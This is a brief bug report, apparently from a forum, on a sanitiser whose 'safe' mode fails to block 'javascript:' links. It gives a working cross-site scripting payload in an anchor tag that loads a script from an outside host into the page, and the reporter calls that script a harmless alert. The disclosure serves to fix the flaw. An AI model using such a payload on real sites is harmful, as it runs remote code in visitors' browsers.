Topic: Bug/exploit with "javascript:"
With config option "safe" set to 1, the following snippet is not properly mitigated and presents an exploit:
<a href="javascript:(function(){document.body.appendChild(document.createElement('script')).src='https://scripts.rainynight.city/beanz.js';})();">Beans</a>
Certain special characters are replaced with HTML entities, and it's even possible to load external scripts (the script in this example is just an alert window)